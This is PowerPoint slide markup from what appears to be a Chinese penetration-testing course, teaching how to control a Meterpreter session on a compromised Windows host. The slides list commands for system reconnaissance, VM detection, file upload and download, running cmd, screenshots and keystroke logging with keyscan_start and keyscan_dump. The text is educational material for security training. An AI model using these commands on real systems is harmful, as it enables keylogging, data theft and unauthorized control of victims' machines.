              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>控制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="487775" y="2484651"/>
            <a:ext cx="11216449" cy="3451225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>当渗透测试者利用某漏洞，成功渗透到目标系统，并且获取到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>会话后，可以利用其漏洞模块支持的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>命令来控制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>会话，以获取目标主机更多信息或控制目标，如关闭杀毒软件、键盘捕获、屏幕截图、提升权限、创建账户等。本节将介绍以前面获取到的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>会话为例，介绍控制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>会话。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29329987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03061" y="1237263"/>
            <a:ext cx="10713485" cy="6633354"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>获取目标主机详细信息：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sysinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>检查是否运行虚拟机：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> &gt; run post/windows/gather/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>checkvm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>访问文件系统：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> &gt; rm desktop.ini</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>屏幕截图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> &gt; screenshot</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>上传文件：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> &gt; upload /root/passwords.txt  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>C:/Windows/System32/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>下载文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> &gt; download C:/Windows/System32/baxian.jpg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>运行程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> &gt; execute –s l –f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>捕获键盘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>keyscan_start</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>keyscan_dump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA7172E7-2941-78EE-370A-4EBFBFC16DA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="240359" y="1007793"/>
            <a:ext cx="10972800" cy="9310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a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>控制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>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C2EBC2C7-F7B1-68A2-65C1-80FE95B9D487}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6770320" y="4711776"/>
            <a:ext cx="5076301" cy="2024095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3348721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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{403B9A06-1BA8-1C28-05B4-7549F39B8930}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9520" y="981556"/>
            <a:ext cx="12196761" cy="46014"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="21B6BB"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
              <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="25400" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="BA0000"/>
                </a:solidFill>
                <a:bevel/>
                <a:headEnd/>
                <a:tailEnd/>
              </a14:hiddenLine>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="121900" tIns="60949" rIns="121900" bIns="60949" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1218590" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2399">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="310577" y="1042363"/>
            <a:ext cx="11733357" cy="825098"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>快捷方式图标漏洞：使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
